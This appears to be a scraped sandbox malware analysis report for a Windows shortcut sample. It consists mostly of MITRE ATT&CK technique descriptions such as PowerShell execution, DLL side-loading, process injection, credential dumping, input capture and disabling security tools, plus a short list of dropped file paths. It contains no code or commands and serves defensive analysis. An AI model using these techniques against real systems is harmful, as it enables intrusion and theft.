Description:	Adversaries may interact with the native OS application programming interface (API) to execute behaviors. Native APIs provide a controlled means of calling low-level OS services within the kernel, such as those involving hardware/devices, memory, and processes.These native APIs are leveraged by the OS during system boot (when other system components are not yet initialized) as well as carrying out tasks and requests during routine operations.
Tactics:	Execution
Data Sources:	Module: Module Load, Process: OS API Execution
Platforms:	Linux, macOS, Windows
Url:	Open detailed description by Mitre

Description:	Adversaries may abuse command and script interpreters to execute commands, scripts, or binaries. These interfaces and languages provide ways of interacting with computer systems and are a common feature across many different platforms. Most systems come with some built-in command-line interface and scripting capabilities, for example, macOS and Linux distributions include some flavor of Unix Shell while Windows installations include the Windows Command Shell and PowerShell .
Tactics:	Execution
Data Sources:	Command: Command Execution, Module: Module Load, Process: Process Creation, Process: Process Metadata, Script: Script Execution
Platforms:	Azure AD, Google Workspace, IaaS, Linux, macOS, Network, Office 365, Windows
Url:	Open detailed description by Mitre

Description:	Adversaries may abuse PowerShell commands and scripts for execution. PowerShell is a powerful interactive command-line interface and scripting environment included in the Windows operating system.Adversaries can use PowerShell to perform a number of actions, including discovery of information and execution of code. Examples include the `Start-Process` cmdlet which can be used to run an executable and the `Invoke-Command` cmdlet which runs a command locally or on a remote computer (though administrator permissions are required to use PowerShell to connect to remote systems).
Tactics:	Execution
Data Sources:	Command: Command Execution, Module: Module Load, Process: Process Creation, Process: Process Metadata, Script: Script Execution
Platforms:	Windows
Url:	Open detailed description by Mitre

Description:	Adversaries may execute their own malicious payloads by side-loading DLLs. Similar to DLL Search Order Hijacking , side-loading involves hijacking which DLL a program loads. But rather than just planting the DLL within the search order of a program then waiting for the victim application to be invoked, adversaries may directly side-load their payloads by planting then invoking a legitimate application that executes their payload(s).
Tactics:	Defense Evasion, Persistence, Privilege Escalation
Data Sources:	File: File Creation, File: File Modification, Module: Module Load, Process: Process Creation
Platforms:	Windows
Url:	Open detailed description by Mitre

Description:	Adversaries may create an account to maintain access to victim systems. With a sufficient level of access, creating such accounts may be used to establish secondary credentialed access that do not require persistent remote access tools to be deployed on the system.
Tactics:	Persistence
Data Sources:	Command: Command Execution, Process: Process Creation, User Account: User Account Creation
Platforms:	Azure AD, Containers, Google Workspace, IaaS, Linux, macOS, Network, Office 365, SaaS, Windows
Url:	Open detailed description by Mitre

Description:	Adversaries may achieve persistence by adding a program to a startup folder or referencing it with a Registry run key. Adding an entry to the "run keys" in the Registry or startup folder will cause the program referenced to be executed when a user logs in.These programs will be executed under the context of the user and will have the account's associated permissions level.
Tactics:	Persistence, Privilege Escalation
Data Sources:	Command: Command Execution, File: File Modification, Process: Process Creation, Windows Registry: Windows Registry Key Creation, Windows Registry: Windows Registry Key Modification
Platforms:	Windows
Url:	Open detailed description by Mitre

Description:	Adversaries may exploit software vulnerabilities in an attempt to elevate privileges. Exploitation of a software vulnerability occurs when an adversary takes advantage of a programming error in a program, service, or within the operating system software or kernel itself to execute adversary-controlled code. Security constructs such as permission levels will often hinder access to information and use of certain techniques, so adversaries will likely need to perform privilege escalation to include use of software exploitation to circumvent those restrictions.
Tactics:	Privilege Escalation
Data Sources:	Driver: Driver Load, Process: Process Creation
Platforms:	Containers, Linux, macOS, Windows
Url:	Open detailed description by Mitre

Description:	Adversaries may modify access tokens to operate under a different user or system security context to perform actions and bypass access controls. Windows uses access tokens to determine the ownership of a running process. A user can manipulate access tokens to make a running process appear as though it is the child of a different process or belongs to someone other than the user that started the process. When this occurs, the process also takes on the security context associated with the new token.
Tactics:	Defense Evasion, Privilege Escalation
Data Sources:	Active Directory: Active Directory Object Modification, Command: Command Execution, Process: OS API Execution, Process: Process Creation, Process: Process Metadata, User Account: User Account Metadata
Platforms:	Windows
Url:	Open detailed description by Mitre

Description:	Adversaries may inject code into processes in order to evade process-based defenses as well as possibly elevate privileges. Process injection is a method of executing arbitrary code in the address space of a separate live process. Running code in the context of another process may allow access to the process's memory, system/network resources, and possibly elevated privileges. Execution via process injection may also evade detection from security products since the execution is masked under a legitimate process.
Tactics:	Defense Evasion, Privilege Escalation
Data Sources:	File: File Metadata, File: File Modification, Module: Module Load, Process: OS API Execution, Process: Process Access, Process: Process Metadata, Process: Process Modification
Platforms:	Linux, macOS, Windows
Url:	Open detailed description by Mitre

Description:	Adversaries may modify and/or disable security tools to avoid possible detection of their malware/tools and activities. This may take many forms, such as killing security software processes or services, modifying / deleting Registry keys or configuration files so that tools do not operate properly, or other methods to interfere with security tools scanning or reporting information. Adversaries may also disable updates to prevent the latest security patches from reaching tools on victim systems.
Tactics:	Defense Evasion
Data Sources:	Command: Command Execution, Driver: Driver Load, Process: Process Creation, Process: Process Termination, Sensor Health: Host Status, Service: Service Metadata, Windows Registry: Windows Registry Key Deletion, Windows Registry: Windows Registry Key Modification
Platforms:	Containers, IaaS, Linux, macOS, Network, Windows
Url:	Open detailed description by Mitre

Description:	Adversaries may use Obfuscated Files or Information to hide artifacts of an intrusion from analysis. They may require separate mechanisms to decode or deobfuscate that information depending on how they intend to use it. Methods for doing that include built-in functionality of malware or by using utilities present on the system.
Tactics:	Defense Evasion
Data Sources:	File: File Modification, Process: Process Creation, Script: Script Execution
Platforms:	Linux, macOS, Windows
Url:	Open detailed description by Mitre

Description:	Adversaries may attempt to make an executable or file difficult to discover or analyze by encrypting, encoding, or otherwise obfuscating its contents on the system or in transit. This is common behavior that can be used across different platforms and the network to evade defenses.
Tactics:	Defense Evasion
Data Sources:	Command: Command Execution, File: File Creation, File: File Metadata, Module: Module Load, Process: OS API Execution, Process: Process Creation, Script: Script Execution, WMI: WMI Creation, Windows Registry: Windows Registry Key Creation
Platforms:	Linux, macOS, Windows
Url:	Open detailed description by Mitre

Description:	Adversaries may attempt to manipulate features of their artifacts to make them appear legitimate or benign to users and/or security tools. Masquerading occurs when the name or location of an object, legitimate or malicious, is manipulated or abused for the sake of evading defenses and observation. This may include manipulating file metadata, tricking users into misidentifying the file type, and giving legitimate task or service names.
Tactics:	Defense Evasion
Data Sources:	Command: Command Execution, File: File Metadata, File: File Modification, Image: Image Metadata, Process: OS API Execution, Process: Process Creation, Process: Process Metadata, Scheduled Job: Scheduled Job Metadata, Scheduled Job: Scheduled Job Modification, Service: Service Creation, Service: Service Metadata
Platforms:	Containers, Linux, macOS, Windows
Url:	Open detailed description by Mitre

Description:	Adversaries may employ various means to detect and avoid virtualization and analysis environments. This may include changing behaviors based on the results of checks for the presence of artifacts indicative of a virtual machine environment (VME) or sandbox. If the adversary detects a VME, they may alter their malware to disengage from the victim or conceal the core functions of the implant. They may also search for VME artifacts before dropping secondary or additional payloads. Adversaries may use the information learned from [Virtualization/Sandbox Evasion](https://attack.mitre.org/techniques/T1497) during automated discovery to shape follow-on behaviors.
Tactics:	Defense Evasion, Discovery
Data Sources:	Command: Command Execution, Process: OS API Execution, Process: Process Creation
Platforms:	Linux, macOS, Windows
Url:	Open detailed description by Mitre

Description:	Adversaries may attempt to dump credentials to obtain account login and credential material, normally in the form of a hash or a clear text password, from the operating system and software. Credentials can then be used to perform Lateral Movement and access restricted information.
Tactics:	Credential Access
Data Sources:	Active Directory: Active Directory Object Access, Command: Command Execution, File: File Access, Network Traffic: Network Traffic Content, Network Traffic: Network Traffic Flow, Process: OS API Execution, Process: Process Access, Process: Process Creation, Windows Registry: Windows Registry Key Access
Platforms:	Linux, macOS, Windows
Url:	Open detailed description by Mitre

Description:	Adversaries may use methods of capturing user input to obtain credentials or collect information. During normal system usage, users often provide credentials to various different locations, such as login pages/portals or system dialog boxes. Input capture mechanisms may be transparent to the user (e.g. Credential API Hooking ) or rely on deceiving the user into providing input into what they believe to be a genuine service (e.g. Web Portal Capture ).
Tactics:	Collection, Credential Access
Data Sources:	Driver: Driver Load, File: File Modification, Process: OS API Execution, Process: Process Creation, Process: Process Metadata, Windows Registry: Windows Registry Key Modification
Platforms:	Linux, macOS, Network, Windows
Url:	Open detailed description by Mitre

Description:	An adversary may gather the system time and/or time zone from a local or remote system. The system time is set and stored by the Windows Time Service within a domain to maintain time synchronization between systems and services in an enterprise network.
Tactics:	Discovery
Data Sources:	Command: Command Execution, Process: OS API Execution, Process: Process Creation
Platforms:	Network, Windows
Url:	Open detailed description by Mitre

Description:	Adversaries may attempt to get a listing of valid accounts, usernames, or email addresses on a system or within a compromised environment. This information can help adversaries determine which accounts exist, which can aid in follow-on behavior such as brute-forcing, spear-phishing attacks, or account takeovers (e.g., Valid Accounts ).
Tactics:	Discovery
Data Sources:	Command: Command Execution, File: File Access, Process: Process Creation
Platforms:	Azure AD, Google Workspace, IaaS, Linux, macOS, Office 365, SaaS, Windows
Url:	Open detailed description by Mitre

Behavior Section

Behavior Chronological

Disassembly

Uncategorized

Graph

Loading Joe Sandbox Report ...

Warning!

Windows Analysis Report sEOELQpFOB.lnk

Overview

General Information

Detection

Signatures

Classification

Process Tree

Malware Threat Intel

Malware Configuration

Yara Signatures

Memory Dumps

Unpacked PEs

Sigma Signatures

System Summary

Suricata Signatures

Joe Sandbox Signatures

AV Detection

Cryptography

Compliance

Spreading

Software Vulnerabilities

Networking

Key, Mouse, Clipboard, Microphone and Screen Capturing

Protection of GUI

System Summary

Data Obfuscation

Persistence and Installation Behavior

Boot Survival

Hooking and other Techniques for Hiding and Protection

Malware Analysis System Evasion

Anti Debugging

HIPS / PFW / Operating System Protection Evasion

Language, Device and Operating System Detection

Lowering of HIPS / PFW / Operating System Security Settings

Stealing of Sensitive Information

Remote Access Functionality

Mitre Att&ck Matrix

Behavior Graph

Screenshots

Thumbnails

Antivirus, Machine Learning and Genetic Malware Detection

Initial Sample

Dropped Files

Unpacked PE Files

Domains

URLs

Domains and IPs

Contacted Domains

Contacted URLs

URLs from Memory and Binaries

World Map of Contacted IPs

Public IPs

Private

General Information

Warnings

Simulations

Behavior and APIs

Joe Sandbox View / Context

IPs

Domains

ASNs

JA3 Fingerprints

Dropped Files

Created / dropped Files

C:\ProgramData\Microsoft\Network\Downloader\edb.chk

C:\ProgramData\Microsoft\Network\Downloader\edb.log

C:\ProgramData\Microsoft\Network\Downloader\qmgr.db

C:\ProgramData\Microsoft\Network\Downloader\qmgr.jfm

C:\Users\user\AppData\LocalLow\Adobe\AcroCef\DC\Acrobat\Cache\LOG

C:\Users\user\AppData\LocalLow\Adobe\AcroCef\DC\Acrobat\Cache\LOG.old (copy)

C:\Users\user\AppData\LocalLow\Adobe\AcroCef\DC\Acrobat\Cache\Local Storage\leveldb\LOG

C:\Users\user\AppData\LocalLow\Adobe\AcroCef\DC\Acrobat\Cache\Local Storage\leveldb\LOG.old (copy)

C:\Users\user\AppData\LocalLow\Adobe\AcroCef\DC\Acrobat\Cache\Network\0a3d570c-f98f-4c29-a166-a0ea49a21e5a.tmp

Windows Analysis Report
sEOELQpFOB.lnk

Description:	Adversaries may enumerate files and directories or may search in specific locations of a host or network share for certain information within a file system. Adversaries may use the information from File and Directory Discovery during automated discovery to shape follow-on behaviors, including whether or not the adversary fully infects the target and/or attempts specific actions.
Tactics:	Discovery
Data Sources:	Command: Command Execution, Process: OS API Execution, Process: Process Creation
Platforms:	Linux, macOS, Network, Windows
Url:	Open detailed description by Mitre

Description:	An adversary may attempt to get detailed information about the operating system and hardware, including version, patches, hotfixes, service packs, and architecture. Adversaries may use the information from System Information Discovery during automated discovery to shape follow-on behaviors, including whether or not the adversary fully infects the target and/or attempts specific actions.
Tactics:	Discovery
Data Sources:	Command: Command Execution, Process: OS API Execution, Process: Process Creation
Platforms:	IaaS, Linux, macOS, Network, Windows
Url:	Open detailed description by Mitre

Description:	Adversaries may attempt to get information about running processes on a system. Information obtained could be used to gain an understanding of common software/applications running on systems within the network. Adversaries may use the information from Process Discovery during automated discovery to shape follow-on behaviors, including whether or not the adversary fully infects the target and/or attempts specific actions.
Tactics:	Discovery
Data Sources:	Command: Command Execution, Process: OS API Execution, Process: Process Creation
Platforms:	Linux, macOS, Network, Windows
Url:	Open detailed description by Mitre

Description:	Adversaries may attempt to identify the primary user, currently logged in user, set of users that commonly uses a system, or whether a user is actively using the system. They may do this, for example, by retrieving account usernames or by using OS Credential Dumping . The information may be collected in a number of different ways using other Discovery techniques, because user and username details are prevalent throughout a system and include running process ownership, file/directory ownership, session information, and system logs. Adversaries may use the information from [System Owner/User Discovery](https://attack.mitre.org/techniques/T1033) during automated discovery to shape follow-on behaviors, including whether or not the adversary fully infects the target and/or attempts specific actions.
Tactics:	Discovery
Data Sources:	Active Directory: Active Directory Object Access, Command: Command Execution, File: File Access, Network Traffic: Network Traffic Content, Network Traffic: Network Traffic Flow, Process: OS API Execution, Process: Process Access, Process: Process Creation, Windows Registry: Windows Registry Key Access
Platforms:	Linux, macOS, Network, Windows
Url:	Open detailed description by Mitre

Description:	An adversary may compress and/or encrypt data that is collected prior to exfiltration. Compressing the data can help to obfuscate the collected data and minimize the amount of data sent over the network. Encryption can be used to hide information that is being exfiltrated from detection or make exfiltration less conspicuous upon inspection by a defender.
Tactics:	Collection
Data Sources:	Command: Command Execution, File: File Creation, Process: Process Creation, Script: Script Execution
Platforms:	Linux, macOS, Windows
Url:	Open detailed description by Mitre

Description:	Adversaries may search local system sources, such as file systems and configuration files or local databases, to find files of interest and sensitive data prior to Exfiltration.
Tactics:	Collection
Data Sources:	Command: Command Execution, File: File Access, Process: OS API Execution, Process: Process Creation, Script: Script Execution
Platforms:	Linux, macOS, Network, Windows
Url:	Open detailed description by Mitre

Description:	Adversaries may target user email to collect sensitive information. Emails may contain sensitive data, including trade secrets or personal information, that can prove valuable to adversaries. Adversaries can collect or forward email from mail servers or clients.
Tactics:	Collection
Data Sources:	Application Log: Application Log Content, Command: Command Execution, File: File Access, Logon Session: Logon Session Creation, Network Traffic: Network Connection Creation
Platforms:	Google Workspace, Linux, macOS, Office 365, Windows
Url:	Open detailed description by Mitre

Description:	Adversaries may collect data stored in the clipboard from users copying information within or between applications.
Tactics:	Collection
Data Sources:	Command: Command Execution, Process: OS API Execution
Platforms:	Linux, macOS, Windows
Url:	Open detailed description by Mitre

Description:	Adversaries may transfer tools or other files from an external system into a compromised environment. Tools or files may be copied from an external adversary-controlled system to the victim network through the command and control channel or through alternate protocols such as ftp . Once present, adversaries may also transfer/spread tools between victim devices within a compromised environment (i.e. Lateral Tool Transfer ).
Tactics:	Command and Control
Data Sources:	Command: Command Execution, File: File Creation, Network Traffic: Network Connection Creation, Network Traffic: Network Traffic Content, Network Traffic: Network Traffic Flow
Platforms:	Linux, macOS, Windows
Url:	Open detailed description by Mitre

Description:	Adversaries may employ a known encryption algorithm to conceal command and control traffic rather than relying on any inherent protections provided by a communication protocol. Despite the use of a secure algorithm, these implementations may be vulnerable to reverse engineering if secret keys are encoded and/or generated within malware samples/configuration files.
Tactics:	Command and Control
Data Sources:	Network Traffic: Network Traffic Content
Platforms:	Linux, macOS, Windows
Url:	Open detailed description by Mitre